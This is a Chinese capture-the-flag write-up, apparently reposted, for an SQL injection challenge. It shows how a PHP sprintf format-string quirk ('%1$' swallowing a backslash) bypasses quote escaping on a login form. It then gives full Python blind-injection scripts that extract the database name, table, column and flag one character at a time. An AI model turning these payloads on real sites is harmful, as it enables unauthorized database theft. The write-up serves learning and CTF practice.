“迎圣诞,拿大奖”活动赛题------------SQLi

其他 2018-09-02 20:51:58 阅读次数: 0
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/nzjdsds/article/details/82152085

=========================================

个人收获

1.sprintf 格式漏洞

=========================================

题目

上来先扫下目录看下源码和http请求发现没有什么奇怪的地方,也就八九不离十是sql注入了

扫描二维码关注公众号,回复: 3017978 查看本文章

开始想尝试 万能密码 后来发现有过滤

尝试用admin/admin登陆

说明存在admin用户

这里我先用自己的字典看看网站过滤什么字符

其他的字符都是提示【username error!】

唯独%出现了不同的提示

这里用了sprintf函数,sprint函数有个漏洞 https://blog.csdn.net/nzjdsds/article/details/82156123

这里我们直接用文中的%1$会吃掉\的方法来构造

先按照文中的方法拿admin%1$\' and 1=1%23进行尝试

结果返回了username error!,照一开始的测试来说

若and 1=1执行成功应该会返回password error!这里猜测and被和谐了

接着换成or语句试试

可以看到这里or语句被成功执行了,接下来就是盲注的时间了

(这里我转载自https://www.cnblogs.com/Ragd0ll/p/8745597.html

先看当前数据库的长度:

#coding:utf-8

import requests
import string



dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'
for i in range(30):
    key = "admin%1$\\' or " + "(length(database())=" + str(i) + ")#"
    data = {'username':key, 'password':'111'}
    r = requests.post(url, data=data).content
    if right in str(r):
        print('the length of database is %s' %i)

import requests
import string



dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'

database = ''
for j in range(1,4):
    for each in dic:
        key = "admin%1$\\' or " + "(ascii(substr(database(),%s,1))="%j + str(ord(each)) + ")#"
        data = {'username':key, 'password':'111'}
        r = requests.post(url, data=data).content
        print(key)
        if right in str(r):
            database += each
            print(each)
            break
print('the name of database is %s'%database)

import requests
import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'
i = 1
while True:
    key = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=" + str(i) + "#"
    data = {'username':key, 'password':'111'}
    r = requests.post(url, data=data).content
    print(r)
    if right in str(r):
        print('the length of tables is %s' %i)
        break
    i += 1

import requests
import string

dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
right = 'password error!'
worry = 'username error!'
url = 'http://335ba99138724fb9938bd2756b0c7ba5aba7efad86a84ab9.game.ichunqiu.com/'
table = ''
for i in range(1,5):
    for j in dic:
        key = "admin%1$\\' or " + "(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%s,1))="%i + str(ord(j)) + ")#"
        data = {'username':key, 'password':'111'}
        r = requests.post(url, data=data).content
        print(key)
        if right in str(r):
            table += j
            print(j)
            break
print('the name of table is %s'%table)

接下来的代码我就省略前面定义url、dic这些东西,直接给出判断语句(其实判断语句也很简单,拿着上面跑表的语句改改就好了)

i = 1
while True:
    key = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name=0x666c6167 limit 0,1)=" + str(i) + "#"
    data = {'username':key, 'password':'111'}
    r = requests.post(url, data=data).content
    print(r)
    if right in str(r):
        print('the length of columns is %s' %i)
        break
    i += 1

column = ''
for i in range(1,5):
    for j in dic:
        key = "admin%1$\\' or " + "(ascii(substr((select column_name from information_schema.columns where table_name=0x666c6167 limit 0,1),%s,1))="%i + str(ord(j)) + ")#"
        data = {'username':key, 'password':'111'}
        r = requests.post(url, data=data).content
        print(key)
        if right in str(r):
            column += j
            print(j)
            break
print('the name of column is %s'%column)

i = 1
while True:
    key = "admin%1$\\' or " + "(select length(flag) from flag limit 0,1)=" + str(i) + "#"
    data = {'username':key, 'password':'111'}
    r = requests.post(url, data=data).content
    print(key)
    if right in str(r):
        print('the length of data is %s' %i)
        break
    i += 1

flag = ''
for i in range(1,43):
    for j in dic:
        key = "admin%1$\\' or " + "(ascii(substr((select flag from flag limit 0,1),%s,1))="%i + str(ord(j)) + ")#"
        data = {'username':key, 'password':'111'}
        r = requests.post(url, data=data).content
        print(key)
        if right in str(r):
            flag += j
            print(j)
            break
print('the flag is %s'%flag)

这题的关键还是要知道sprintf格式化字符的漏洞,后面的盲注并没有过滤相关的关键词,导致盲注起来没有压力

猜你喜欢

转载自blog.csdn.net/nzjdsds/article/details/82152085
今日推荐
周排行
深度学习------Lingvo框架下的加速通道GPipe
webjars管理静态资源
C专家编程_2.2
mysql 源码安装
json文件操作
123231432
注解的实现
Spring MVC 控制器
《人月神话》读后感二
C#使用HttpWebRequest和HttpWebResponse上传文件示例
每日归档
更多
2024-09-08(0)
2024-09-07(0)
2024-09-06(0)
2024-09-05(0)
2024-09-04(0)
2024-09-03(0)
2024-09-02(0)
2024-09-01(0)
2024-08-31(0)
2024-08-30(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022